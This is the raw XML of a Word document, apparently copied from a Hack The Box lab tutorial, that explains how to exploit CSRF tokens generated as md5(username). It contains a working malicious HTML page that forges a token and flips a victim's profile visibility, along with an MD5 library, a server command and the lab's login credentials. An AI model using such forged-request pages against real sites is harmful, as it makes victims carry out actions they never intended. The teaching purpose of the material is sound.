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F10B" w14:textId="77777777" w:rsidR="006B0831" w:rsidRPr="006B0831" w:rsidRDefault="006B0831" w:rsidP="006B08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  <w:t>Exploiting Weak CSRF Tokens</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="330D0917" w14:textId="77777777" w:rsidR="006B0831" w:rsidRPr="006B0831" w:rsidRDefault="006B0831" w:rsidP="006B08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0E7A4AC1">
          <v:rect id="_x0000_i1025" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="162285E2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Often, web applications do not employ very secure or robust token generation algorithms. An example is an application that generates CSRF tokens as follows (pseudocode): </w:t>
      </w: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md5(username)</w:t>
      </w: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4576F05D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How can we tell if that is the case? We can register an account, look into the requests to identify a CSRF token, and then check if the MD5 hash of the username is equal to the CSRF token's value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF001A3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Let us see this in action!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587BD2F5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Proceed to the end of this section and click on </w:t>
      </w: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Click here to spawn the target system!</w:t>
      </w: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or the </w:t>
      </w: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Reset Target</w:t>
      </w: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icon. Use the provided Pwnbox or a local VM with the supplied VPN key to reach the target application and follow along. Don't forget to configure the specified vhost (</w:t>
      </w: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csrf.htb.net</w:t>
      </w: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) to access the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2158EDE0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Navigate to </w:t>
      </w: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http://csrf.htb.net</w:t>
      </w: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log in to the application using the credentials below:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BAA814A" w14:textId="77777777" w:rsidR="006B0831" w:rsidRPr="006B0831" w:rsidRDefault="006B0831" w:rsidP="006B0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Email: goldenpeacock467</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072EE8B3" w14:textId="77777777" w:rsidR="006B0831" w:rsidRPr="006B0831" w:rsidRDefault="006B0831" w:rsidP="006B0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Password: topcat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA1D566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Open Web Developer Tools (Shift+Ctrl+I in the case of Firefox) and focus on the </w:t>
      </w:r>
      <w:r w:rsidRPr="006B08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SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Network</w:t>
      </w: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tab.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="348470A3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Back to the user's profile, press </w:t>
      </w:r>
      <w:r w:rsidRPr="006B08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SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Change Visibility</w:t>
      </w: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then </w:t>
      </w:r>
      <w:r w:rsidRPr="006B08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SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Make Public</w:t>
      </w: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57E1FB19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You should see a request similar to the one below. Note the value of the CSRF token.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136ADEC7" w14:textId="5B37B2FD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04928989" wp14:editId="146B857D">
            <wp:extent cx="5731510" cy="3147695"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1255950842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32F7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lastRenderedPageBreak/>
        <w:t>Execute the below command to calculate the MD5 hash of the string "goldenpeacock467" (the username).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="113CE9D3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yovecio@htb[/htb]$ echo -n goldenpeacock467 | md5sum</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E3110D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0bef12f8998057a7656043b6d30c90a2  -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A1211E9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You will notice that the resulting hash is the same as the CSRF value! This means that the CSRF token is generated by MD5-hashing the username.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524610F4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When assessing how robust a CSRF token generation mechanism is, make sure you spend a small amount of time trying to come up with the CSRF token generation mechanism. It can be as easy as </w:t>
      </w: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md5(username)</w:t>
      </w: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</w:t>
      </w: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sha1(username)</w:t>
      </w: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</w:t>
      </w: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md5(current date + username)</w:t>
      </w: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etc. Please note that you should not spend much time on this, but it is worth a shot.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65053D66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Now that we know how the CSRF token for this action is generated let us see how we can attack other users through CSRF.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15116D51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Find below the malicious page. Save it as </w:t>
      </w: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press_start_2_win.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589B682F" w14:textId="77777777" w:rsidR="006B0831" w:rsidRPr="006B0831" w:rsidRDefault="006B0831" w:rsidP="006B08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html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF8AFE9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&lt;!DOCTYPE html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B815982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&lt;html lang="en"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C539E3A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6EE9F447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&lt;head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204D4680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&lt;meta charset="UTF-8"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F9655F8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&lt;meta http-equiv="X-UA-Compatible" content="IE=edge"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556CF125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&lt;meta name="viewport" content="width=device-width, initial-scale=1.0"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6C016A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&lt;meta name="referrer" content="never"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7F2BB3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&lt;title&gt;Proof-of-concept&lt;/title&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12BC7D52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&lt;link rel="stylesheet" href="styles.css"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6420800A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&lt;script src="./md5.min.js"&gt;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DDCE3E3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&lt;/head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1F56A7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034C20AF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&lt;body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8E8F27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&lt;h1&gt; Click Start to win!&lt;/h1&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A1679C6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&lt;button class="button" onclick="trigger()"&gt;Start!&lt;/button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4A9105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76AA62D3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&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019E3C28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let host = 'http://csrf.htb.net'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E76759E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118AF2E3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function trigger(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A94AE32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// Creating/Refreshing the token in server side.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54EB6714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window.open(`${host}/app/change-visibility`)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65DE4138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window.setTimeout(startPoc, 2000)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A78E680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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2F7838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5723CD44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function startPoc() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13868A24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// Setting the username</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B6E31CA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let hash = md5("crazygorilla983")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D78DA64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605EF728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window.location = `${host}/app/change-visibility/confirm?csrf=${hash}&amp;action=change`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363CA8A7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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501ED074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&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="492FDE69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&lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C744E0A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&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E2C50E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lastRenderedPageBreak/>
        <w:t xml:space="preserve">For your malicious page to have MD5-hashing functionality, save the below as </w:t>
      </w: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md5.min.js</w:t>
      </w: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place it in the directory where the malicious page resides.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AAE6162" w14:textId="77777777" w:rsidR="006B0831" w:rsidRPr="006B0831" w:rsidRDefault="006B0831" w:rsidP="006B08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javascript</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EDAC863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!function(n){"use strict";function d(n,t){var r=(65535&amp;n)+(65535&amp;t);return(n&gt;&gt;16)+(t&gt;&gt;16)+(r&gt;&gt;16)&lt;&lt;16|65535&amp;r}function f(n,t,r,e,o,u){return d((u=d(d(t,n),d(e,u)))&lt;&lt;o|u&gt;&gt;&gt;32-o,r)}function l(n,t,r,e,o,u,c){return f(t&amp;r|~t&amp;e,n,t,o,u,c)}function g(n,t,r,e,o,u,c){return f(t&amp;e|r&amp;~e,n,t,o,u,c)}function v(n,t,r,e,o,u,c){return f(t^r^e,n,t,o,u,c)}function m(n,t,r,e,o,u,c){return f(r^(t|~e),n,t,o,u,c)}function c(n,t){var r,e,o,u;n[t&gt;&gt;5]|=128&lt;&lt;t%32,n[14+(t+64&gt;&gt;&gt;9&lt;&lt;4)]=t;for(var c=1732584193,f=-271733879,i=-1732584194,a=271733878,h=0;h&lt;n.length;h+=16)c=l(r=c,e=f,o=i,u=a,n[h],7,-680876936),a=l(a,c,f,i,n[h+1],12,-389564586),i=l(i,a,c,f,n[h+2],17,606105819),f=l(f,i,a,c,n[h+3],22,-1044525330),c=l(c,f,i,a,n[h+4],7,-176418897),a=l(a,c,f,i,n[h+5],12,1200080426),i=l(i,a,c,f,n[h+6],17,-1473231341),f=l(f,i,a,c,n[h+7],22,-45705983),c=l(c,f,i,a,n[h+8],7,1770035416),a=l(a,c,f,i,n[h+9],12,-1958414417),i=l(i,a,c,f,n[h+10],17,-42063),f=l(f,i,a,c,n[h+11],22,-1990404162),c=l(c,f,i,a,n[h+12],7,1804603682),a=l(a,c,f,i,n[h+13],12,-40341101),i=l(i,a,c,f,n[h+14],17,-1502002290),c=g(c,f=l(f,i,a,c,n[h+15],22,1236535329),i,a,n[h+1],5,-165796510),a=g(a,c,f,i,n[h+6],9,-1069501632),i=g(i,a,c,f,n[h+11],14,643717713),f=g(f,i,a,c,n[h],20,-373897302),c=g(c,f,i,a,n[h+5],5,-701558691),a=g(a,c,f,i,n[h+10],9,38016083),i=g(i,a,c,f,n[h+15],14,-660478335),f=g(f,i,a,c,n[h+4],20,-405537848),c=g(c,f,i,a,n[h+9],5,568446438),a=g(a,c,f,i,n[h+14],9,-1019803690),i=g(i,a,c,f,n[h+3],14,-187363961),f=g(f,i,a,c,n[h+8],20,1163531501),c=g(c,f,i,a,n[h+13],5,-1444681467),a=g(a,c,f,i,n[h+2],9,-51403784),i=g(i,a,c,f,n[h+7],14,1735328473),c=v(c,f=g(f,i,a,c,n[h+12],20,-1926607734),i,a,n[h+5],4,-378558),a=v(a,c,f,i,n[h+8],11,-2022574463),i=v(i,a,c,f,n[h+11],16,1839030562),f=v(f,i,a,c,n[h+14],23,-35309556),c=v(c,f,i,a,n[h+1],4,-1530992060),a=v(a,c,f,i,n[h+4],11,1272893353),i=v(i,a,c,f,n[h+7],16,-155497632),f=v(f,i,a,c,n[h+10],23,-1094730640),c=v(c,f,i,a,n[h+13],4,681279174),a=v(a,c,f,i,n[h],11,-358537222),i=v(i,a,c,f,n[h+3],16,-722521979),f=v(f,i,a,c,n[h+6],23,76029189),c=v(c,f,i,a,n[h+9],4,-640364487),a=v(a,c,f,i,n[h+12],11,-421815835),i=v(i,a,c,f,n[h+15],16,530742520),c=m(c,f=v(f,i,a,c,n[h+2],23,-995338651),i,a,n[h],6,-198630844),a=m(a,c,f,i,n[h+7],10,1126891415),i=m(i,a,c,f,n[h+14],15,-1416354905),f=m(f,i,a,c,n[h+5],21,-57434055),c=m(c,f,i,a,n[h+12],6,1700485571),a=m(a,c,f,i,n[h+3],10,-1894986606),i=m(i,a,c,f,n[h+10],15,-1051523),f=m(f,i,a,c,n[h+1],21,-2054922799),c=m(c,f,i,a,n[h+8],6,1873313359),a=m(a,c,f,i,n[h+15],10,-30611744),i=m(i,a,c,f,n[h+6],15,-1560198380),f=m(f,i,a,c,n[h+13],21,1309151649),c=m(c,f,i,a,n[h+4],6,-145523070),a=m(a,c,f,i,n[h+11],10,-1120210379),i=m(i,a,c,f,n[h+2],15,718787259),f=m(f,i,a,c,n[h+9],21,-343485551),c=d(c,r),f=d(f,e),i=d(i,o),a=d(a,u);return[c,f,i,a]}function i(n){for(var t="",r=32*n.length,e=0;e&lt;r;e+=8)t+=String.fromCharCode(n[e&gt;&gt;5]&gt;&gt;&gt;e%32&amp;255);return t}function a(n){var t=[];for(t[(n.length&gt;&gt;2)-1]=void 0,e=0;e&lt;t.length;e+=1)t[e]=0;for(var r=8*n.length,e=0;e&lt;r;e+=8)t[e&gt;&gt;5]|=(255&amp;n.charCodeAt(e/8))&lt;&lt;e%32;return </w:t>
      </w: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lastRenderedPageBreak/>
        <w:t>t}function e(n){for(var t,r="0123456789abcdef",e="",o=0;o&lt;n.length;o+=1)t=n.charCodeAt(o),e+=r.charAt(t&gt;&gt;&gt;4&amp;15)+r.charAt(15&amp;t);return e}function r(n){return unescape(encodeURIComponent(n))}function o(n){return i(c(a(n=r(n)),8*n.length))}function u(n,t){return function(n,t){var r,e=a(n),o=[],u=[];for(o[15]=u[15]=void 0,16&lt;e.length&amp;&amp;(e=c(e,8*n.length)),r=0;r&lt;16;r+=1)o[r]=909522486^e[r],u[r]=1549556828^e[r];return t=c(o.concat(a(t)),512+8*t.length),i(c(u.concat(t),640))}(r(n),r(t))}function t(n,t,r){return t?r?u(t,n):e(u(t,n)):r?o(n):e(o(n))}"function"==typeof define&amp;&amp;define.amd?define(function(){return t}):"object"==typeof module&amp;&amp;module.exports?module.exports=t:n.md5=t}(this);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A466B5D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//# sourceMappingURL=md5.min.js.map</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A9189C0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We can serve the page and JavaScript code above from our attacking machine as follows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5E8914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yovecio@htb[/htb]$ python -m http.server 1337</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01BDA78D" w14:textId="77777777" w:rsidR="006B0831" w:rsidRPr="006B0831" w:rsidRDefault="006B0831" w:rsidP="006B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Serving HTTP on 0.0.0.0 port 1337 (http://0.0.0.0:1337/) ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D17342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Open a </w:t>
      </w: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New Private Window</w:t>
      </w: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navigate to </w:t>
      </w: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http://csrf.htb.net</w:t>
      </w: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log in to the application using the credentials below:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="753F9D2B" w14:textId="77777777" w:rsidR="006B0831" w:rsidRPr="006B0831" w:rsidRDefault="006B0831" w:rsidP="006B0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Email: crazygorilla983</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247D6492" w14:textId="77777777" w:rsidR="006B0831" w:rsidRPr="006B0831" w:rsidRDefault="006B0831" w:rsidP="006B0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Password: pisces</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798808E1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This account will play the role of the victim. As you can see, Ela Stienen's profile is not public. Let us try to make it public through a CSRF attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C9A9C1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While still logged in as Ela Stienen, open a new tab and visit the page you are serving from your attacking machine </w:t>
      </w:r>
      <w:r w:rsidRPr="006B083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http://&lt;VPN/TUN Adapter IP&gt;:1337/press_start_2_win.html</w:t>
      </w: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3D82416E" w14:textId="3CFF7DCD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04B301D3" wp14:editId="6F7029C6">
            <wp:extent cx="5731510" cy="2182495"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="1720366838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FD97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Now press "Start!". You will notice that when Ela Stienen presses "Start," her profile will become public!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45516186" w14:textId="7668E639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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="62599FD7" wp14:editId="02DA86A1">
            <wp:extent cx="5731510" cy="5215890"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3810"/>
            <wp:docPr id="2094031225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1916" w14:textId="77777777" w:rsidR="006B0831" w:rsidRPr="006B0831" w:rsidRDefault="006B0831" w:rsidP="006B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6B083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The following section will focus on some possible CSRF protection bypasses that you should try during web application penetration tests or bug bounty hunting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E9F99E3" w14:textId="77777777" w:rsidR="00213442" w:rsidRDefault="00213442"/>
    <w:sectPr w:rsidR="0021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3CE2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E620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051C7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0900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783169">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1419059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D7"/>
    <w:rsid w:val="00213442"/>
    <w:rsid w:val="006B0831"/>
    <w:rsid w:val="00DE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89EB4"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{D7BE3918-AEF8-419C-9DBE-C0559091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831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paragraph" w:customStyle="1" w:styleId="msonormal0">
    <w:name w:val="msonormal"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="006B0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0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083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0831"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="windowdot">
    <w:name w:val="window_dot"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="006B0831"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="windowtitle">
    <w:name w:val="window_title"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="006B08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831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token">
    <w:name w:val="token"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="006B0831"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="text-gray">
    <w:name w:val="text-gray"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="006B0831"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="text-success">
    <w:name w:val="text-success"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="006B0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</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-12-27T10:13:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-12-27T10:13:00Z</dcterms:modified>
</cp:coreProperties>
</file>